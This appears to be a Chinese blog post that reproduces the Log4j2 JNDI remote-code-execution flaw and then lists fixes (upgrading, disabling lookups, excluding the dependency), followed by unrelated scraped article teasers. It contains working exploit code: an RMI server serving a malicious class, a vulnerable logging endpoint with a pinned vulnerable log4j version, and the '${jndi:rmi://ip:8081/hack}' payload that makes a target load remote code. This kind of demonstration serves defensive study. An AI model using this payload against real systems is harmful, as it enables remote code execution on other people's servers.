`FUTURE`
`FUTURE`

Log4j漏洞及解决方案,亲测

先说一下漏洞,看代码吧(漏洞复现)

描述:
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0-rc2 版本。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。
影响版本:
经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下:Apache Log4j 2.x < 2.15.0-rc2

public class HackService {

    public static void main(String[] args) {
        try {
            // 启动服务
            LocateRegistry.createRegistry(8081);
            Registry registry = LocateRegistry.getRegistry();
            // 创建资源
            Reference reference = new Reference("com.example.log4jdemo.hei.HackTool", "com.example.log4jdemo.hei.HackTool", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            // 绑定资源
            registry.bind("hack", referenceWrapper);
            System.out.println("服务初始化完成");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

public class HackTool {
    static {
        System.out.println("先来一个 -> rm -rf /");
    }
}

@RequestMapping("test")
@RestController
public class TestController {


    private static final Logger logger = LogManager.getLogger(TestController.class);

    @RequestMapping(value = "search")
    public Object test(@RequestParam String str) {
       logger.error("入参:{}",str);
       return "OK";
    }

    public static void main(String[] args) {
        String str = "${jndi:rmi://ip:8081/hack}";//${jndi:rmi://ip:8081/hack}
        logger.error("入参:{}",str);
    }
}

@SpringBootApplication
public class Log4jDemoApplication {

    public static void main(String[] args) {
        SpringApplication.run(Log4jDemoApplication.class, args);
    }
}

对应的pom文件

 <parent>
        <groupId>org.springframework.bootgroupId>
        <artifactId>spring-boot-starter-parentartifactId>
        <version>1.5.7.RELEASEversion>
        <relativePath/> 
    parent>
	<properties>
        <java.version>1.8java.version>
    properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.bootgroupId>
            <artifactId>spring-boot-starterartifactId>
        dependency>

        <dependency>
            <groupId>org.springframework.bootgroupId>
            <artifactId>spring-boot-starter-testartifactId>
            <scope>testscope>
        dependency>
        <dependency>
            <groupId>org.springframework.bootgroupId>
            <artifactId>spring-boot-starter-webartifactId>
        dependency>

        
       
        <dependency>
            <groupId>org.apache.logging.log4jgroupId>
            <artifactId>log4j-apiartifactId>
            <version>2.12.1version>

        dependency>
        <dependency>
            <groupId>org.apache.logging.log4jgroupId>
            <artifactId>log4j-coreartifactId>
            <version>2.12.1version>

        dependency>
    dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.bootgroupId>
                <artifactId>spring-boot-maven-pluginartifactId>
            plugin>
        plugins>
    build>

通过测试发现我们在使用2.0–>2.14版本的时候会出现漏洞,log.error的时候会调这个接口jndi:rmi://ip:8081/hack

解决方案1(升级版本)

升级到2.15之后就不会调用了也就解决了这个漏洞

解决方案2 (临时方案)

JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true
log4j2.formatMsgNoLookups=True
FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true

具体操作如下:

  1. nohup java -jar -Dlog4j2.formatMsgNoLookups=true xxx.jar &
  2. 在resources目录下新建一个log4j2.component.properties文件里面放log4j2.formatMsgNoLookups=True即可
  3. 在系统环境变量中添加
    变量名:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 变量值:true

解决方案3(排除log4j)

可以通过maven helper来排除掉log4j的依赖,因为有时候这些依赖并不是自己依赖进来的可能是您所依赖的的依赖里面的依赖
在这里插入图片描述
Log4j漏洞及解决方案,亲测_第1张图片

你可能感兴趣的:(大数据,java,微服务,java,安全,开发语言)

  • Github 2025-06-24Python开源项目日报 Top10 老孙正经胡说 github开源Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2025-06-24统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量Python项目10Swift项目1C++项目1yt-dlp:一个增强版的youtube-dl分支创建周期:1184天开发语言:Python协议类型:TheUnlicenseStar数量:64607个Fork数量:5309次关注人数:64607人贡献
  • 中间件复习(java向,示例代码为java),所有问题都会有链接单独解析 搞不懂语言的程序员 重拾java中间件中间件java开发语言
    根据近些年情况整理的Java服务常用中间件及面试复习指南(每个中间件10个以上问题+实战模拟)一、核心中间件清单(2020-2023高频使用)中间件分类典型中间件核心应用场景RPC框架Dubbo3.x、gRPC、SpringCloudOpenFeign微服务通信、跨语言调用消息队列Kafka、RocketMQ、RabbitMQ异步解耦、削峰填谷、顺序消息缓存Redis(集群/Redisson)、C
  • 打造安全认证系统:AWS Amplify与React集成 竹石文化传播有限公司 AWSAmplify用户认证React应用集成后端资源管理UI组件
    背景简介在现代应用开发中,用户认证系统是保障安全和提供个性化体验的核心部分。本文将基于AWSAmplify的使用和配置,探讨如何在React应用程序中设置和集成一个全面的用户认证系统。设置认证系统所需的关键组件在为应用程序设置认证时,需要考虑以下几个重要组件:用户管理用户管理是指允许预定义用户列表访问系统,包括用户创建、阻止或删除等功能。角色管理角色管理涉及定义不同类型的用户角色,并将这些角色分配
  • CloudFormation 实现 GitHub Actions OIDC 与 AWS ECR 的安全集成(支持多组织配置) ivwdcwso 运维与云原生githubawsecrCI/CDOIDC流水线
    、##引言:多组织场景下的安全挑战在企业环境中,经常需要为不同的GitHub组织(如开发组织dp和测试组织test)配置不同的访问权限。本文将详细介绍如何通过AWSCloudFormation模板实现灵活的OIDC集成,支持多GitHub组织的安全访问控制。第一部分:多组织架构设计安全认证流程(多组织场景)
  • 展开说说Android之Retrofit详解_使用篇 老梁学Android&HarmonyOS 网络编程androidretrofit网络
    Retrofit是由Square公司开发的类型安全HTTP客户端框架,借助动态代理在运行时生成接口实现类,将注解转化为OkHttp请求配置;节省成本通过转换器(Gson/Moshi)自动序列化JSON/XML,内部处理网络请求在主线程返回报文。Retrofit直译是封装、翻版。他就是对okhttp做了进一步封装,方便使用,它底层的所有请求默认走的都是Okhttp。所以使用Retrofit必须依赖o
  • 假如你从现在开始学习软件测试,需要多久才能学会呢? AIZHINAN 学习
    首先,不要去网上找那些零零碎碎的教程,很难学懂!你可以根据这个学习大纲定计划只要3-6个月就可以掌握软件测试,升职涨薪不在话下:1.基础阶段:先搞懂测试理论、用例设计,会用Jira写Bug;2.中级阶段:学SQL查数据、Linux看日志,Postman测接口,再用Selenium玩自动化;3.进阶阶段:搭Pytest框架、用JMeter压测,安全测试搞BurpSuite;4.扩展技能:Python
  • 软件测试面试前该准备些什么? AIZHINAN 面试软件测试面试软件测试面经简历包装面试技巧
    在软件测试面试前,充分的准备可以显著提升你的信心和表现。以下是需要重点关注的准备方向,分为技术能力、项目经验、面试技巧和软技能四个部分:一、技术能力准备基础理论软件测试基本概念:测试类型(功能、性能、安全、兼容性等)、测试阶段(单元测试、集成测试、系统测试等)。经典面试题:黑盒vs白盒测试的区别?什么是边界值分析、等价类划分?Bug的生命周期是怎样的?如何设计测试用例?(举例:测试一个登录页面)测
  • GitHub Actions 实现 AWS ECS 服务的多集群安全重启方案 ivwdcwso 运维与云原生githubaws安全DevOpsCI/CDgithubactions
    引言在现代云原生架构中,容器化服务已成为主流。AmazonECS(ElasticContainerService)作为AWS的核心容器服务,管理着大量生产环境中的关键应用。服务重启是日常运维中的常见操作,无论是部署更新、修复问题还是刷新状态,都需要一种安全高效的机制。本文将介绍如何利用GitHubActions和AWSOIDC实现一个安全、灵活的多集群ECS服务重启方案。这个方案不仅简化了运维流程
  • 左神算法之二叉树最大路径和问题 岳轩子 左神算法算法深度优先
    二叉树最大路径和问题(Java实现)文章目录二叉树最大路径和问题(Java实现)1.题目描述2.问题解释3.解决思路4.代码实现5.总结1.题目描述给定一棵二叉树,其中每个节点都包含一个整型权值。要求计算从根节点到叶节点的所有路径中,权值和最大的值是多少。2.问题解释必须从根节点出发到叶子节点结束需要遍历所有可能的路径找出所有路径和中最大的那个值叶子节点是指没有子节点的节点3.解决思路采用深度优先
  • Zeek网络安全分析框架深入体验 八位数花园
    本文还有配套的精品资源,点击获取简介:Zeek(前身为Bro)是一个强大的开源网络分析工具,专门用于监控和分析网络流量以识别安全威胁。它通过事件驱动的方式解析多种网络协议,并具备实时分析、非侵入式部署、强大的日志记录能力,以及丰富的脚本语言支持,是网络安全专业人员不可或缺的工具之一。通过本课程,学生将掌握Zeek的核心功能,包括其日志系统、事件处理机制,以及如何通过编写Zeek脚本来扩展分析能力,
  • 政企终端安全综合治理方案(无技术人员) 兢谨网安 企业安全政务安全网络安全网络攻击模型渗透测试网络
    核心原则:制度管理为主,技术工具为辅,全员参与共治一、管理机制建设(关键措施,占比70%)行政指令强制规范发布《办公终端软件安装白名单制度》仅允许安装政务版杀毒软件、办公软件(如WPS政务版)、专用业务系统。白名单示例:360安全卫士政务版、奇安信、金山毒霸企业版(政务)、微软Office(正版授权)、企业微信政务版。明确禁止行为(纳入员工守则):禁止安装娱乐软件(如视频播放器、游戏)、破解软件、
  • EXILIUM×亚矩云手机:重构Web3虚拟生存法则,开启多端跨链元宇宙自由征途 云云321 智能手机重构web3
    在链游与元宇宙赛道竞争加剧的当下,EXILIUM凭借其去中心化开放世界、链上资产确权与玩家自治经济系统,成为Web3原住民逃离“中心化牢笼”的首选之地。然而,其多链交互门槛高、跨设备身份管理复杂、链上安全风险频发等问题,让普通玩家与工作室陷入“自由与风险”的双重困境。亚矩云手机通过云端虚拟化架构、跨链协议兼容与零信任安全体系,为EXILIUM用户提供“链上自由”与“现实可控”的平衡方案,让元宇宙探
  • deepseek:2025年Java面试必刷高频LeetCode题目 Alexon Xu java面试leetcode
    以下是2025年Java面试中高频LeetCode题目分类及对应链接,结合大厂实际考察频率整理:一、链表类反转链表(Easy)迭代法与递归实现双解,掌握三指针操作环形链表检测(Easy)快慢指针经典应用,延伸考察环入口点计算合并K个排序链表(Hard)优先队列解法时间复杂度O(NlogK)相交链表(Easy)双指针数学技巧:a+c+b=b+c+a删除链表的倒数第N个节点(Medium)快慢指针+虚
  • iOS 应用安全加固指南:通过 IPA 混淆与防破解技术实现全面防护 00后程序员张 httpudphttpswebsocket网络安全网络协议tcp/ip
    在现代移动应用开发中,安全性已不再是一个可以忽视的领域。随着黑客技术的日益成熟以及用户对隐私保护的重视,开发者必须将安全性嵌入到应用的每一个开发环节中,而不仅仅是在开发的后期进行加固。尤其是对于那些涉及用户数据、支付信息等敏感内容的应用,确保应用的安全性是至关重要的。本文将介绍iOS应用开发中的安全实践,并结合具体的安全加固技术,如使用IpaGuard、Obfuscator-LLVM,从应用的设计
  • 网安知识“大乱炖“ Lovely_18 网安知识积累
    网安知识"大乱炖"Windows安全事件日志常用EventID:EventID含义说明4624登录成功表示用户成功登录系统4625登录失败✅表示登录尝试失败,是暴力破解最关键的日志标志4672特权登录表示具有管理员权限的账户登录(用于检测高权限账户活动)4648显式凭证登录用户在使用runas或远程方式提供用户名/密码登录暴力破解相关日志特征:连续触发大量4625登录失败来自同一个IP或多个IP的
  • DOP数据开放平台(真实线上项目) JAVA拾贝 java数据开放平台接口开放平台监控限流接口过滤自动文档
    什么是数据开放平台?数据开放平台是一种通过公开应用程序编程接口(API)或结构化数据,允许第三方开发者或机构访问、使用和共享数据的平台‌,旨在促进数据流通、打破信息孤岛并激发创新应用。DOP数据开放平台简单演示DOP数据开放平台(JAVA语言)DOP数据开放平台优势网址:DOP数据开放平台商户可自行注册,管理员开放权限访问接口向下兼容,方便版本迭代响应报文过滤,数据更安全支持监控限流,服务更稳定自
  • Joda-Time 日期时间库介绍 hweiyu00 技术栈杂谈开发语言java
    一、Joda-Time是什么?Joda-Time是由StephenColebourne开发的开源日期时间库,用于替代Java标准库中的java.util.Date和java.util.Calendar。它因设计更合理、使用更便捷,曾是Java开发中处理日期时间的主流选择,尤其在Java8推出新的日期时间API(java.time包)之前被广泛使用。二、Joda-Time解决了Java标准库的哪些问
  • MyBatis 简介 hweiyu00 技术栈杂谈mybatis
    MyBatis简介MyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射,能够帮助开发者将Java对象与数据库表进行灵活映射,简化数据持久化操作。以下从多个维度详细介绍MyBatis:一、核心定位与优势轻量级框架:相比Hibernate等全自动ORM框架,MyBatis更“轻”,开发者需手动编写SQL语句,灵活性更高,便于优化性能。ORM映射功能:通过XML或注解方式,将J
  • Go 语言高效连接 SQL Server(MSSQL)数据库实战指南 程序员爱钓鱼 数据库golangsqlserver
    在Go语言的开发过程中,与MicrosoftSQLServer(MSSQL)数据库的交互是常见需求之一。本文将详细介绍如何使用Go语言高效、安全地连接SQLServer,并进行基本的CRUD(增删改查)操作。1.安装MSSQL驱动Go语言使用github.com/denisenkom/go-mssqldb作为SQLServer驱动,首先需要安装它:goget-ugithub.com/denisen
  • CentOS 入门必备基础知识与操作指南 码上有潜 linuxcentoslinux运维
    标题:CentOS入门必备基础知识与操作指南简介CentOS是基于RedHatEnterpriseLinux(RHEL)的社区版本,适合企业级服务器的稳定性和安全性要求。本文将带领你了解CentOS的基础知识、安装过程、常用命令以及一些常见的运维操作。1.什么是CentOS?定义:CentOS是一个开放源代码的企业级操作系统,免费提供,但与RHEL完全兼容。优势:稳定、安全、适合长时间运行的服务器
  • istio简介 weixin_50801368 微服务运维
    servicemeshservicemesh的中文译为“服务网格”,是一个用于处理服务和服务之间通信的基础设施层,它负责为构建复杂的云原生应用传递可靠的网络请求,并为服务通信实现了微服务所需的基本组件功能,例如服务发现、负载均衡、监控、流量管理,访问控制等。在实践中,服务网格通常实现为一组和应用程序部署在一起的轻量级的网络代理,但对应用程序来说是透明的绿色方块为应用服务,蓝色方块为sidecarp
  • 容器化与微服务 何遇mirror 服务器容器微服务
    目录编辑第一节:容器化与微服务第二节:Docker与Kubernetes的介绍第三节:容器与传统虚拟化的对比第四节:微服务架构与虚拟化实际案例分析第一节:容器化与微服务容器化与微服务概述容器化是一种轻量级的虚拟化技术,它允许开发者将应用程序及其依赖项打包成一个可移植的容器。微服务架构则是一种将大型应用程序分解为小的、独立的服务的方法,这些服务可以独立部署、扩展和维护。容器化的优势轻量级:容器使用共
  • Flutter开发环境配置指南 harmonyos
    环境相关问题flutter开发环境配置参考建议使用的开发工具版本flutter3.22.0-ohos版本python3.8-python3.11java17node18ohpm1.6+HamonyOSSDKapi11Xcode14.3断网环境flutterpubget执行失败解决方案:加上--offline参数,完整命令flutterpubget--offline。mac环境release版本的应
  • Istio 深度解析与实战:从原理到应用的全面指南 阿贾克斯的黎明 javaistio网络云原生
    目录Istio深度解析与实战:从原理到应用的全面指南一、Istio原理深度剖析1.数据平面2.控制平面二、Istio的安装与部署1.环境准备2.安装Istio3.注入Sidecar三、Istio实战应用场景1.流量管理(1)简单路由(2)流量镜像2.安全防护(1)服务间双向认证(2)基于角色的访问控制(RBAC)3.监控与可观测性(1)启用Prometheus和Grafana(2)查看监控指标四、
  • 储能电池舱防爆通风环控系统有哪些要求? ZNHKJ 储能风电智能环控系统能源
    纵观储能行业发展历程,技术水平突飞猛进,各类政策、规范标准都已取得长足进步,但起火爆燃事故却始终如影随形,储能安全也成为业内关注的焦点。起火爆燃何故频发,又应当如何防范呢?储能站大多采用的是锂电池,极易产生易燃易爆炸气体,一旦锂电池本身发生自燃就会在短时间内爆炸,直接影响现场工作人员的生命安全及其他设备的正常运行,所以就需要在日常运营维护和意外产生的时候有一套完备的储能泄爆排风系统,在灭火的时候做
  • 危急时刻显身手:AORO M6 Pro防爆对讲机的实战智慧 AORO_BEIDOU 人工智能信息与通信5G科技
    在工业安全与应急通信领域,设备的技术自主性与智能化水平已成为衡量核心竞争力的关键指标。面对复杂多变的作业环境与日益严苛的安全标准,AOROM6Pro防爆对讲机凭借“纯血国产”的技术底座与“AI赋能”的创新突破,为危化、能源、公共安全等领域提供了兼具安全性与高效能的通信解决方案。这款斩获2024年度AI天马“臻品”殊荣的产品,不仅重新定义了防爆对讲机的技术标杆,更以本土化创新回应了行业对极端场景通信
  • 为何需要防爆平板?它究竟有何能耐? AORO_BEIDOU 电脑安全信息与通信人工智能5G
    在石油化工、矿山能源、危化品仓储等特殊工业领域,空气中常弥漫着易燃易爆的气体、粉尘或蒸汽,环境风险极高。普通商用电子产品在此处存在不容忽视的隐患:其内部电路元件的微小火花,或运行过程积累的热量,都有可能瞬间引燃周遭的爆炸性混合物,酿成灾难性后果。这便是这些危险作业场景严格管控电子设备使用的核心原因。防爆平板应此严苛需求而生,成为了在威胁边缘实现安全生产与有效管理的不可替代的工具。AOROP9000
  • 内测分发平台是否支持应用的微服务化部署 咕噜企业签名分发-大圣 微服务架构云原生
    内测分发平台是否支持应用的微服务化部署,这个问题实际上触及到了现代软件开发和运维的深层次需求。其支持程度不仅仅是一个简单的“是”或“否”的答案,而是涉及到平台的设计理念、技术架构以及实际应用场景的综合考量。首先,一些走在技术前沿的内测分发平台,它们在设计之初就充分考虑了微服务架构的复杂性和多样性。这些平台不仅原生支持微服务架构,还提供了丰富多样的工具和接口,以帮助开发者高效地管理和部署微服务。例如
  • 凌晨の3点,线程池竟在服务器里偷偷···· 山海上的风 Java服务器java-ee线程池
    凌晨の3点,线程池の竟在服务器里偷偷榨干CPU····⚡️CPU:JAVAKing为窝发声,HELPME⚡️JAVAKING今天将揭露线程池的罪恶行为⚡️《线程池:OH,YES》线程池到底对项目做了什么想象一下:每次点外卖都新雇一个厨师‍,吃完就开除——这就是裸奔线程的日常!在高并发三巨头(电商秒杀、金融交易、大数据处理)中:1️⃣CPU哭诉:90%时间在面试线程,10%干活(线程切换开销)2️⃣
  • Edge-TTS在广电系统中的语音合成技术的创新应用
    Edge-TTS在广电系统中的语音合成技术的创新应用作者:本人是一名县级融媒体中心的工程师,多年来一直坚持学习、提升自己。喜欢Python编程、人工智能、网络安全等多领域的技术。摘要随着人工智能技术的快速发展,文字转语音(Text-to-Speech,TTS)系统已成为多种应用的重要组成部分,尤其在广播电视领域。本文介绍了一种基于Edge-TTS大模型的文字转语音工具,该工具结合了现代文本处理和语
  • github中多个平台共存 jackyrong github
    在个人电脑上,如何分别链接比如oschina,github等库呢,一般教程之列的,默认 ssh链接一个托管的而已,下面讲解如何放两个文件 1) 设置用户名和邮件地址 $ git config --global user.name "xx" $ git config --global user.email "[email protected]"
  • ip地址与整数的相互转换(javascript) alxw4616 JavaScript
    //IP转成整型 function ip2int(ip){ var num = 0; ip = ip.split("."); num = Number(ip[0]) * 256 * 256 * 256 + Number(ip[1]) * 256 * 256 + Number(ip[2]) * 256 + Number(ip[3]); n
  • 读书笔记-jquey+数据库+css chengxuyuancsdn htmljqueryoracle
    1、grouping ,group by rollup, GROUP BY GROUPING SETS区别 2、$("#totalTable tbody>tr td:nth-child(" + i + ")").css({"width":tdWidth, "margin":"0px", &q
  • javaSE javaEE javaME == API下载 Array_06 java
    oracle下载各种API文档: http://www.oracle.com/technetwork/java/embedded/javame/embed-me/documentation/javame-embedded-apis-2181154.html JavaSE文档: http://docs.oracle.com/javase/8/docs/api/ JavaEE文档: ht
  • shiro入门学习 cugfy javaWeb框架
    声明本文只适合初学者,本人也是刚接触而已,经过一段时间的研究小有收获,特来分享下希望和大家互相交流学习。 首先配置我们的web.xml代码如下,固定格式,记死就成 <filter>         <filter-name>shiroFilter</filter-name> &nbs
  • Array添加删除方法 357029540 js
         刚才做项目前台删除数组的固定下标值时,删除得不是很完整,所以在网上查了下,发现一个不错的方法,也提供给需要的同学。 //给数组添加删除             Array.prototype.del = function(n){
  • navigation bar 更改颜色 张亚雄 IO
    今天郁闷了一下午,就因为objective-c默认语言是英文,我写的中文全是一些乱七八糟的样子,到不是乱码,但是,前两个自字是粗体,后两个字正常体,这可郁闷死我了,问了问大牛,人家告诉我说更改一下字体就好啦,比如改成黑体,哇塞,茅塞顿开。       翻书看,发现,书上有介绍怎么更改表格中文字字体的,代码如下    
  • unicode转换成中文 adminjun unicode编码转换
      在Java程序中总会出现\u6b22\u8fce\u63d0\u4ea4\u5fae\u535a\u641c\u7d22\u4f7f\u7528\u53cd\u9988\uff0c\u8bf7\u76f4\u63a5这个的字符,这是unicode编码,使用时有时候不会自动转换成中文就需要自己转换了使用下面的方法转换一下即可。 /** * unicode 转换成 中文
  • 一站式 Java Web 框架 firefly aijuans Java Web
    Firefly是一个高性能一站式Web框架。 涵盖了web开发的主要技术栈。 包含Template engine、IOC、MVC framework、HTTP Server、Common tools、Log、Json parser等模块。 firefly-2.0_07修复了模版压缩对javascript单行注释的影响,并新增了自定义错误页面功能。 更新日志: 增加自定义系统错误页面功能
  • 设计模式——单例模式 ayaoxinchao 设计模式
    定义          Java中单例模式定义:“一个类有且仅有一个实例,并且自行实例化向整个系统提供。”   分析          从定义中可以看出单例的要点有三个:一是某个类只能有一个实例;二是必须自行创建这个实例;三是必须自行向系统提供这个实例。   &nb
  • Javascript 多浏览器兼容性问题及解决方案 BigBird2012 JavaScript
    不论是网站应用还是学习js,大家很注重ie与firefox等浏览器的兼容性问题,毕竟这两中浏览器是占了绝大多数。 一、document.formName.item(”itemName”) 问题 问题说明:IE下,可以使用 document.formName.item(”itemName”) 或 document.formName.elements ["elementName&quo
  • JUnit-4.11使用报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing错误 bijian1013 junit4.11单元测试
            下载了最新的JUnit版本,是4.11,结果尝试使用发现总是报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing这样的错误,上网查了一下,一般的解决方案是,换一个低一点的版本就好了。还有人说,是缺少hamcrest的包。去官网看了一下,如下发现:    
  • [Zookeeper学习笔记之二]Zookeeper部署脚本 bit1129 zookeeper
    Zookeeper伪分布式安装脚本(此脚本在一台机器上创建Zookeeper三个进程,即创建具有三个节点的Zookeeper集群。这个脚本和zookeeper的tar包放在同一个目录下,脚本中指定的名字是zookeeper的3.4.6版本,需要根据实际情况修改):   #!/bin/bash #!!!Change the name!!! #The zookeepe
  • 【Spark八十】Spark RDD API二 bit1129 spark
    coGroup package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} import org.apache.spark.SparkContext._ object CoGroupTest_05 { def main(args: Array[String]) { v
  • Linux中编译apache服务器modules文件夹缺少模块(.so)的问题 ronin47 modules
    在modules目录中只有httpd.exp,那些so文件呢? 我尝试在fedora core 3中安装apache 2. 当我解压了apache 2.0.54后使用configure工具并且加入了 --enable-so 或者 --enable-modules=so (两个我都试过了) 去make并且make install了。我希望在/apache2/modules/目录里有各种模块,
  • Java基础-克隆 BrokenDreams java基础
            Java中怎么拷贝一个对象呢?可以通过调用这个对象类型的构造器构造一个新对象,然后将要拷贝对象的属性设置到新对象里面。Java中也有另一种不通过构造器来拷贝对象的方式,这种方式称为 克隆。         Java提供了java.lang.
  • 读《研磨设计模式》-代码笔记-适配器模式-Adapter bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 适配器模式解决的主要问题是,现有的方法接口与客户要求的方法接口不一致 * 可以这样想,我们要写这样一个类(Adapter): * 1.这个类要符合客户的要求 ---> 那显然要
  • HDR图像PS教程集锦&心得 cherishLC PS
    HDR是指高动态范围的图像,主要原理为提高图像的局部对比度。 软件有photomatix和nik hdr efex。 一、教程 叶明在知乎上的回答: http://www.zhihu.com/question/27418267/answer/37317792 大意是修完后直方图最好是等值直方图,方法是HDR软件调一遍,再结合不透明度和蒙版细调。 二、心得 1、去除阴影部分的
  • maven-3.3.3 mvn archetype 列表 crabdave ArcheType
    maven-3.3.3 mvn archetype 列表 可以参考最新的:http://repo1.maven.org/maven2/archetype-catalog.xml   [INFO] Scanning for projects... [INFO]                
  • linux shell 中文件编码查看及转换方法 daizj shell中文乱码vim文件编码
    一、查看文件编码。     在打开文件的时候输入:set fileencoding     即可显示文件编码格式。 二、文件编码转换     1、在Vim中直接进行转换文件编码,比如将一个文件转换成utf-8格式       &
  • MySQL--binlog日志恢复数据 dcj3sjt126com binlog
    恢复数据的重要命令如下 mysql> flush logs; 默认的日志是mysql-bin.000001,现在刷新了重新开启一个就多了一个mysql-bin.000002                  
  • 数据库中数据表数据迁移方法 dcj3sjt126com sql
    刚开始想想好像挺麻烦的,后来找到一种方法了,就SQL中的 INSERT 语句,不过内容是现从另外的表中查出来的,其实就是 MySQL中INSERT INTO SELECT的使用   下面看看如何使用   语法:MySQL中INSERT INTO SELECT的使用 1. 语法介绍       有三张表a、b、c,现在需要从表b
  • Java反转字符串 dyy_gusi java反转字符串
           前几天看见一篇文章,说使用Java能用几种方式反转一个字符串。首先要明白什么叫反转字符串,就是将一个字符串到过来啦,比如"倒过来念的是小狗"反转过来就是”狗小是的念来过倒“。接下来就把自己能想到的所有方式记录下来了。 1、第一个念头就是直接使用String类的反转方法,对不起,这样是不行的,因为Stri
  • UI设计中我们为什么需要设计动效 gcq511120594 UIlinux
    随着国际大品牌苹果和谷歌的引领,最近越来越多的国内公司开始关注动效设计了,越来越多的团队已经意识到动效在产品用户体验中的重要性了,更多的UI设计师们也开始投身动效设计领域。 但是说到底,我们到底为什么需要动效设计?或者说我们到底需要什么样的动效?做动效设计也有段时间了,于是尝试用一些案例,从产品本身出发来说说我所思考的动效设计。 一、加强体验舒适度 嗯,就是让用户更加爽更加爽的用
  • JBOSS服务部署端口冲突问题 HogwartsRow java应用服务器jbossserverEJB3
    服务端口冲突问题的解决方法,一般修改如下三个文件中的部分端口就可以了。   1、jboss5/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml   2、./server/default/deploy/jbossweb.sar/server.xml   3、.
  • 第三章 Redis/SSDB+Twemproxy安装与使用 jinnianshilongnian ssdbreidstwemproxy
    目前对于互联网公司不使用Redis的很少,Redis不仅仅可以作为key-value缓存,而且提供了丰富的数据结果如set、list、map等,可以实现很多复杂的功能;但是Redis本身主要用作内存缓存,不适合做持久化存储,因此目前有如SSDB、ARDB等,还有如京东的JIMDB,它们都支持Redis协议,可以支持Redis客户端直接访问;而这些持久化存储大多数使用了如LevelDB、RocksD
  • ZooKeeper原理及使用 liyonghui160com
               ZooKeeper是Hadoop Ecosystem中非常重要的组件,它的主要功能是为分布式系统提供一致性协调(Coordination)服务,与之对应的Google的类似服务叫Chubby。今天这篇文章分为三个部分来介绍ZooKeeper,第一部分介绍ZooKeeper的基本原理,第二部分介绍ZooKeeper
  • 程序员解决问题的60个策略 pda158 框架工作单元测试
    根本的指导方针 1. 首先写代码的时候最好不要有缺陷。最好的修复方法就是让 bug 胎死腹中。 良好的单元测试 强制数据库约束 使用输入验证框架 避免未实现的“else”条件 在应用到主程序之前知道如何在孤立的情况下使用   日志 2. print 语句。往往额外输出个一两行将有助于隔离问题。 3. 切换至详细的日志记录。详细的日
  • Create the Google Play Account sillycat Google
    Create the Google Play Account Having a Google account, pay 25$, then you get your google developer account. References: http://developer.android.com/distribute/googleplay/start.html https://p
  • JSP三大指令 vikingwei jsp
    JSP三大指令   一个jsp页面中,可以有0~N个指令的定义! 1. page --> 最复杂:<%@page language="java" info="xxx"...%>   * pageEncoding和contentType:     > pageEncoding:它
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他